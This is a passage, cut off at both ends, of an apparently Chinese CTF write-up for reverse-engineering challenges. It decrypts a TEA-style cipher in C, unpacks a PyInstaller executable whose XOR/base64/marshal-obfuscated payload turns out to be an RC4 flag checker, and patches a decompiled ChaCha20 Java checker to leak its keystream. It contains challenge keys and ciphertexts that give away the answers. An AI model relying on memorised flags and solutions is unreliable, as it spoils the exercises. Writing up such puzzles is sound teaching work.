class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [rsp+14h] [rbp-Ch]</span><br> <span class="hljs-type">int</span> sum; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+1Ch] [rbp-4h]</span><br><br> v0 = *a1;<br> v1 = a1[<span class="hljs-number">1</span>];<br> sum = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">31</span>; ++i )<br> {<br> sum -= <span class="hljs-number">0x61C88647</span>;<br> v0 += (v1 + sum) ^ (<span class="hljs-number">16</span> * v1 + *key) ^ ((v1 >> <span class="hljs-number">5</span>) + key[<span class="hljs-number">1</span>]);<br> v1 += (v0 + sum) ^ (<span class="hljs-number">16</span> * v0 + key[<span class="hljs-number">2</span>]) ^ ((v0 >> <span class="hljs-number">5</span>) + key[<span class="hljs-number">3</span>]);<br> }<br> *a1 = v0;<br> result = v1;<br> a1[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/mary19920410/article/details/71518130">浅析C语言之uint8_t / uint16_t / uint32_t /uint64_t-CSDN博客</a></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-type">int</span> delta = <span class="hljs-number">0x61C88647</span>;<br><span class="hljs-type">void</span> <span class="hljs-title function_">decrypt</span><span class="hljs-params">(<span class="hljs-type">uint32_t</span>* v, <span class="hljs-type">uint32_t</span>* k)</span> {<br><span class="hljs-type">uint32_t</span> v3 = v[<span class="hljs-number">0</span>];<br><span class="hljs-type">uint32_t</span> v4 = v[<span class="hljs-number">1</span>];<br><span class="hljs-type">uint32_t</span> sum = ((<span class="hljs-number">32</span> * (-delta)) & <span class="hljs-number">0xffffffff</span>);<br><span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">31</span>; i++) {<br>v4 -= (v3 + sum) ^ (<span class="hljs-number">16</span> * v3 + k[<span class="hljs-number">2</span>]) ^ ((v3 >> <span class="hljs-number">5</span>) + k[<span class="hljs-number">3</span>]);<br>v3 -= (v4 + sum) ^ (<span class="hljs-number">16</span> * v4 + k[<span class="hljs-number">0</span>]) ^ ((v4 >> <span class="hljs-number">5</span>) + k[<span class="hljs-number">1</span>]);<br>sum += <span class="hljs-number">0x61C88647</span>;<br>}<br>v[<span class="hljs-number">0</span>] = v3;<br>v[<span class="hljs-number">1</span>] = v4;<br>}<br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br><span class="hljs-type">uint32_t</span> key[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x01234567</span>, <span class="hljs-number">0x89ABCDEF</span>, <span class="hljs-number">0xFEDCBA98</span>, <span class="hljs-number">0x76543210</span> };<br><span class="hljs-type">uint32_t</span> <span class="hljs-built_in">array</span>[<span class="hljs-number">8</span>] = { <span class="hljs-number">0xDB8F2569</span>, <span class="hljs-number">0x40CD83E3</span>, <span class="hljs-number">0xA033E680</span>, <span class="hljs-number">0xFFF7A644</span>,<br><span class="hljs-number">0x690C3A17</span>, <span class="hljs-number">0xB621B866</span>, <span class="hljs-number">0x34E7E2A7</span>, <span class="hljs-number">0xAD10A692</span> }; <span class="hljs-comment">//密码数据</span><br><span class="hljs-type">uint32_t</span> temp[<span class="hljs-number">2</span>] = { <span class="hljs-number">0</span> };<br><span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">7</span>; i += <span class="hljs-number">2</span>) {<br>temp[<span class="hljs-number">0</span>] = <span class="hljs-built_in">array</span>[i];<br>temp[<span class="hljs-number">1</span>] = <span class="hljs-built_in">array</span>[i + <span class="hljs-number">1</span>];<br>decrypt(temp, key);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c%c%c%c%c%c%c%c"</span>, *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">0</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] +<br><span class="hljs-number">1</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">2</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">0</span>] + <span class="hljs-number">3</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">0</span>), *<br>((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">1</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">2</span>), *((<span class="hljs-type">char</span>*)&temp[<span class="hljs-number">1</span>] + <span class="hljs-number">3</span>));<br>}<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h3 id="WEEK3-easyre"><a href="#WEEK3-easyre" class="headerlink" title="[WEEK3]easyre"></a>[WEEK3]easyre</h3><p>开局一个exe文件,和之前的不同,我们用die看了后是用py打包的,那么我们就解包,反编译</p><blockquote><p>python pyinstxtractor-ng.py 1.exe<br>uncompyle6 main.pyc > main.py</p></blockquote><p>我们把其中的main.pyc转换成py代码</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031212031065.png" alt="image-20231031212031065"></p><p>用gpt得出他的xor的值是23,我们根据他的代码逻辑,他就会执行一个程序,但我们看不到我们需要的代码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> marshal<br><span class="hljs-keyword">from</span> dis <span class="hljs-keyword">import</span> dis<br><br>encoded_data = <span class="hljs-string">b'...'</span><br><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br>decoded_data = base64.b64decode(xor_decoded_data)<br>code_obj = marshal.loads(decoded_data)<br>exce(code_obj)<br></code></pre></td></tr></table></figure><blockquote><p> exec 是 Python 中的一个内置函数,用于执行动态生成的 Python 代码。这个函数接受一个代码对象(通常是由字符串形式的代码或者编译后的字节码构建而成),并执行其中的 Python 语句exec 是 Python 中的一个内置函数,用于执行动态生成的 Python 代码。</p></blockquote><p>重点,接受一个代码对象,通常是由字符串形式的代码或者编译后的字节码构建而成。</p><p>而且前面marshal.loads(decoded_data) 反序列化从某种格式编码的代码。所以现在的encode其实是类似于字节码的存在?因此我们可以直接用dis模块查看code_obj 中包含的 Python 字节码的信息。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> marshal<br><span class="hljs-keyword">from</span> dis <span class="hljs-keyword">import</span> dis<br><br>encoded_data = <span class="hljs-string">b'#`VVVVVVVVVVVVVVVVVVVVVSVVVVFVVVV_YZVVVVMVU|VNFV@pU|V{xUMVYvVzBSMVDSVFRVMFDSV\\VQMV@\x7fVAxPMFU{V@BPp`]vU%B_MF]eVy]VMFY|UxZUVFUbTPBSMVrSVFRVMV\x7fCVT|]N`^VVVVVVVVVVVVVVVpVVVVPVVVVF`VVV_GFVVVVsVU\'V@FUp`PSVO\'TMV].V$FUMVPSVBFVOC".U_`SqV]/UU|VQ`U/V_`RsV]/V^ZUQpVMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVUoPPFTUVU.U_\'SsVXSV_\'QqVQRVQ&pqFM/UPFSQ`U|VENVqFE/V$`TqVFMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVU/Vy`TqVFMV_`TqVZMVUtVMVR@VU|VqFs/UvVRqVM/U\'RVxFRUV_QfqVACVT|RCb|VVFVV!FVVVVSgVFVVVT|Q%pEdvOY\'%pAnN@"yMsxSuPAb%p{~rOE{NO]nNOyvUzQ`tPAbMT|^%pYeMO{vTOUdN@{bsPA#sYxUB.xUvcxUvAx\\N%{`vPAnsPA#sYxRN%\x7f\x7ftcxUv!|Vtp/VVVS!UzM&u~"`rsx[tzZ\'O%AbN$]"t_FUVVVVto`VVVVVVF`UUV^ZVDVU_V^^VFNTTVRZVEVUPpRNVEVTt\x7fRVVVUmT`VVVPA#N@&`uPAqv%A"tnxVVVSN{U!ez%M\'!&&VP ez!UZmA.\'X"g^\'/NUcvXd.TPRTTD!&UB\\`dT.R}Q{!QQUdr~UguyU&sTU"u$An^PMdN@t!rpA&sPNcXQxSr@Am@p]bu\'#gT_^EVVVVtp|VVVUvU@YxM@Ye%pA`tz{bsYxQv@"`sOCvUzAbN%.|MsxRMzo\x7fM&x]M@"}ty{`sPA|tp/VVVUnS`VVV_^GVVVVt\x7fVVVVSvTSocu%E&uPB<VFVVV_ZFVVVVTUFRVFFTTVRZVpxTTVR\\Vp**'</span><br><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br>decoded_data = base64.b64decode(xor_decoded_data)<br>code_obj = marshal.loads(decoded_data)<br>dis(code_obj)<br><br></code></pre></td></tr></table></figure><p>得到字节码后我们直接gpt,转换成正常的py代码,如果gpt是傻子可以尝试第二种方式</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> marshal<br><br>encoded_data = <span class="hljs-string">b'...'</span><br><br>xor_decoded_data = <span class="hljs-built_in">bytes</span>([byte ^ <span class="hljs-number">23</span> <span class="hljs-keyword">for</span> byte <span class="hljs-keyword">in</span> encoded_data])<br><br>decoded_data = base64.b64decode(xor_decoded_data)<br><br><span class="hljs-built_in">open</span>(<span class="hljs-string">"new.pyc"</span>,<span class="hljs-string">"wb"</span>).write(decoded_data)<br></code></pre></td></tr></table></figure><p>将他写入到一个文件里面,然后现在还识别不出他是pyc文件,我们去直接反编译出的pyc里面,随便偷个头过来,将他修复(上面的一串)</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031214116370.png" alt="image-20231031214116370"></p><p>然后再uncompyle6 new.pyc > 1.py</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># uncompyle6 version 3.9.0</span><br><span class="hljs-comment"># Python bytecode version base 3.8.0 (3413)</span><br><span class="hljs-comment"># Decompiled from: Python 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:25:05) [MSC v.1500 64 bit (AMD64)]</span><br><span class="hljs-comment"># Embedded file name: fun.py</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">rc4_encrypt</span>(<span class="hljs-params">key, plaintext</span>):<br> S = <span class="hljs-built_in">list</span>(<span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>))<br> j = <span class="hljs-number">0</span><br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>):<br> j = (j + S[i] + key[i % <span class="hljs-built_in">len</span>(key)]) % <span class="hljs-number">256</span><br> S[i], S[j] = S[j], S[i]<br> <span class="hljs-keyword">else</span>:<br> i = j = <span class="hljs-number">0</span><br> ciphertext = <span class="hljs-built_in">bytearray</span>()<br> <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> plaintext:<br> i = (i + <span class="hljs-number">1</span>) % <span class="hljs-number">256</span><br> j = (j + S[i]) % <span class="hljs-number">256</span><br> S[i], S[j] = S[j], S[i]<br> k = S[(S[i] + S[j]) % <span class="hljs-number">256</span>]<br> ciphertext.append(char ^ k)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(ciphertext) <span class="hljs-comment">#这一段是我自己加的,直接自己调用自己就可以了</span><br> <span class="hljs-keyword">return</span> ciphertext<br><br><br>key = <span class="hljs-string">b'example_key'</span><br>check = <span class="hljs-string">b'\xd8\x94\x1e\xab\x9bft\xeb]@\x1b\xba\xe6\xe8\x133W\xdd\x0e\xe6\x924\xf1\x80mh\xeb=\x08a\x02\t.\xb5\x05B\xb0\xb0/D\x8cY'</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">'Plz input your flag:'</span>)<br>flag = <span class="hljs-built_in">input</span>().encode(<span class="hljs-string">'utf-8'</span>)<br>encrypted = rc4_encrypt(key, flag)<br><span class="hljs-keyword">if</span> encrypted == check:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">'yes'</span>)<br><span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">'no'</span>)<br><span class="hljs-comment"># okay decompiling C:\Users\a\Desktop\new.pyc</span><br><br></code></pre></td></tr></table></figure><p>可以看到就是一个rc4,我们让他自己调用自己就可以解出flag了</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031214441502.png" alt="image-20231031214441502"></p><h3 id="WEEK3-java是最棒的语言吗"><a href="#WEEK3-java是最棒的语言吗" class="headerlink" title="[WEEK3]java是最棒的语言吗"></a>[WEEK3]java是最棒的语言吗</h3><p>将原来的java拷贝下俩,加两处输出,获得密文和密钥,最后异或一下获得flag</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.nio.charset.StandardCharsets;<br><span class="hljs-keyword">import</span> java.util.Arrays;<br><span class="hljs-keyword">import</span> java.util.Scanner;<br><br><span class="hljs-comment">/* renamed from: ChaCha20 reason: default package */</span><br><span class="hljs-comment">/* loaded from: java是最棒的语言吗.class */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">ChaCha20</span> {<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] strArr)</span> {<br> <span class="hljs-type">Scanner</span> <span class="hljs-variable">scanner</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Scanner</span>(System.in);<br> System.out.println(<span class="hljs-string">"input your flag:"</span>);<br> <span class="hljs-type">String</span> <span class="hljs-variable">nextLine</span> <span class="hljs-operator">=</span> scanner.nextLine();<br> <span class="hljs-keyword">if</span> (Arrays.equals(encrypt(nextLine.getBytes(StandardCharsets.UTF_8), <span class="hljs-string">"Shctf_Welcomes_Have_4_good_t1me_"</span>.getBytes(), <span class="hljs-string">"HsehrcOedfgs"</span>.getBytes()), hexStringToBytes(<span class="hljs-string">"ce43283af73d106815fe5293b474f5309d44063c7fde19533300c60603dfe528d19aee2f6db615191e45"</span>))) {<br> System.out.println(<span class="hljs-string">"right!"</span>);<br> } <span class="hljs-keyword">else</span> {<br> System.out.println(<span class="hljs-string">"error!"</span>);<br> }<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">byte</span>[] encrypt(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">byte</span>[] bArr2, <span class="hljs-type">byte</span>[] bArr3) {<br> <span class="hljs-type">int</span>[] chachaInit = chachaInit(bArr2, bArr3);<br> <span class="hljs-type">byte</span>[] bArr4 = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[bArr.length];<br> <span class="hljs-type">byte</span>[] bArr5 = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[<span class="hljs-number">64</span>];<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < bArr.length; i += <span class="hljs-number">64</span>) {<br> chachaBlock(chachaInit, bArr5);<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i2</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i2 < <span class="hljs-number">64</span> && i + i2 < bArr.length; i2++) {<br> bArr4[i + i2] = (<span class="hljs-type">byte</span>) (bArr[i + i2] ^ bArr5[i2]);<br> System.out.print(bArr5[i2] + <span class="hljs-string">","</span>); ##这里是添加的<br> }<br> System.out.println(<span class="hljs-string">"\n"</span>);<br> chachaInit[<span class="hljs-number">12</span>] = chachaInit[<span class="hljs-number">12</span>] + <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> bArr4;<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span>[] chachaInit(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">byte</span>[] bArr2) {<br> <span class="hljs-type">int</span>[] iArr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">int</span>[<span class="hljs-number">16</span>];<br> iArr[<span class="hljs-number">0</span>] = <span class="hljs-number">1634760805</span>;<br> iArr[<span class="hljs-number">1</span>] = <span class="hljs-number">857760878</span>;<br> iArr[<span class="hljs-number">2</span>] = <span class="hljs-number">2036477234</span>;<br> iArr[<span class="hljs-number">3</span>] = <span class="hljs-number">1797285236</span>;<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < <span class="hljs-number">8</span>; i++) {<br> iArr[<span class="hljs-number">4</span> + i] = bytesToIntLittleEndian(bArr, i * <span class="hljs-number">4</span>);<br> }<br> iArr[<span class="hljs-number">12</span>] = <span class="hljs-number">0</span>;<br> iArr[<span class="hljs-number">13</span>] = <span class="hljs-number">0</span>;<br> iArr[<span class="hljs-number">14</span>] = bytesToIntLittleEndian(bArr2, <span class="hljs-number">0</span>);<br> iArr[<span class="hljs-number">15</span>] = bytesToIntLittleEndian(bArr2, <span class="hljs-number">4</span>);<br> <span class="hljs-keyword">return</span> iArr;<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">chachaBlock</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr, <span class="hljs-type">byte</span>[] bArr)</span> {<br> <span class="hljs-type">int</span>[] copyOf = Arrays.copyOf(iArr, <span class="hljs-number">16</span>);<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < <span class="hljs-number">10</span>; i++) {<br> chachaDoubleRound(copyOf);<br> }<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i2</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i2 < <span class="hljs-number">16</span>; i2++) {<br> intToBytesLittleEndian(iArr[i2] + copyOf[i2], bArr, i2 * <span class="hljs-number">4</span>);<br> }<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">chachaDoubleRound</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr)</span> {<br> quarterRound(iArr, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">8</span>, <span class="hljs-number">12</span>);<br> quarterRound(iArr, <span class="hljs-number">1</span>, <span class="hljs-number">5</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>);<br> quarterRound(iArr, <span class="hljs-number">2</span>, <span class="hljs-number">6</span>, <span class="hljs-number">10</span>, <span class="hljs-number">14</span>);<br> quarterRound(iArr, <span class="hljs-number">3</span>, <span class="hljs-number">7</span>, <span class="hljs-number">11</span>, <span class="hljs-number">15</span>);<br> quarterRound(iArr, <span class="hljs-number">0</span>, <span class="hljs-number">5</span>, <span class="hljs-number">10</span>, <span class="hljs-number">15</span>);<br> quarterRound(iArr, <span class="hljs-number">1</span>, <span class="hljs-number">6</span>, <span class="hljs-number">11</span>, <span class="hljs-number">12</span>);<br> quarterRound(iArr, <span class="hljs-number">2</span>, <span class="hljs-number">7</span>, <span class="hljs-number">8</span>, <span class="hljs-number">13</span>);<br> quarterRound(iArr, <span class="hljs-number">3</span>, <span class="hljs-number">4</span>, <span class="hljs-number">9</span>, <span class="hljs-number">14</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">quarterRound</span><span class="hljs-params">(<span class="hljs-type">int</span>[] iArr, <span class="hljs-type">int</span> i, <span class="hljs-type">int</span> i2, <span class="hljs-type">int</span> i3, <span class="hljs-type">int</span> i4)</span> {<br> iArr[i] = iArr[i] + iArr[i2];<br> iArr[i4] = rotateLeft(iArr[i4] ^ iArr[i], <span class="hljs-number">16</span>);<br> iArr[i3] = iArr[i3] + iArr[i4];<br> iArr[i2] = rotateLeft(iArr[i2] ^ iArr[i3], <span class="hljs-number">12</span>);<br> iArr[i] = iArr[i] + iArr[i2];<br> iArr[i4] = rotateLeft(iArr[i4] ^ iArr[i], <span class="hljs-number">8</span>);<br> iArr[i3] = iArr[i3] + iArr[i4];<br> iArr[i2] = rotateLeft(iArr[i2] ^ iArr[i3], <span class="hljs-number">7</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">rotateLeft</span><span class="hljs-params">(<span class="hljs-type">int</span> i, <span class="hljs-type">int</span> i2)</span> {<br> <span class="hljs-keyword">return</span> (i << i2) | (i >>> (<span class="hljs-number">32</span> - i2));<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">bytesToIntLittleEndian</span><span class="hljs-params">(<span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">int</span> i)</span> {<br> <span class="hljs-keyword">return</span> ((bArr[i + <span class="hljs-number">3</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">24</span>) | ((bArr[i + <span class="hljs-number">2</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">16</span>) | ((bArr[i + <span class="hljs-number">1</span>] & <span class="hljs-number">255</span>) << <span class="hljs-number">8</span>) | (bArr[i] & <span class="hljs-number">255</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">intToBytesLittleEndian</span><span class="hljs-params">(<span class="hljs-type">int</span> i, <span class="hljs-type">byte</span>[] bArr, <span class="hljs-type">int</span> i2)</span> {<br> bArr[i2] = (<span class="hljs-type">byte</span>) (i & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">1</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">8</span>) & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">2</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">16</span>) & <span class="hljs-number">255</span>);<br> bArr[i2 + <span class="hljs-number">3</span>] = (<span class="hljs-type">byte</span>) ((i >>> <span class="hljs-number">24</span>) & <span class="hljs-number">255</span>);<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-type">byte</span>[] hexStringToBytes(String str) {<br> <span class="hljs-type">int</span> <span class="hljs-variable">length</span> <span class="hljs-operator">=</span> str.length();<br> <span class="hljs-type">byte</span>[] bArr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[length / <span class="hljs-number">2</span>];<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < length; i += <span class="hljs-number">2</span>) {<br> bArr[i / <span class="hljs-number">2</span>] = (<span class="hljs-type">byte</span>) ((Character.digit(str.charAt(i), <span class="hljs-number">16</span>) << <span class="hljs-number">4</span>) + Character.digit(str.charAt(i + <span class="hljs-number">1</span>), <span class="hljs-number">16</span>));<br> System.out.print(bArr[i / <span class="hljs-number">2</span>] + <span class="hljs-string">","</span>); ##这里是添加的<br> }<br> <span class="hljs-keyword">return</span> bArr;<br> }<br><br> <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> String <span class="hljs-title function_">bytesToHexString</span><span class="hljs-params">(<span class="hljs-type">byte</span>[] bArr)</span> {<br> <span class="hljs-type">StringBuilder</span> <span 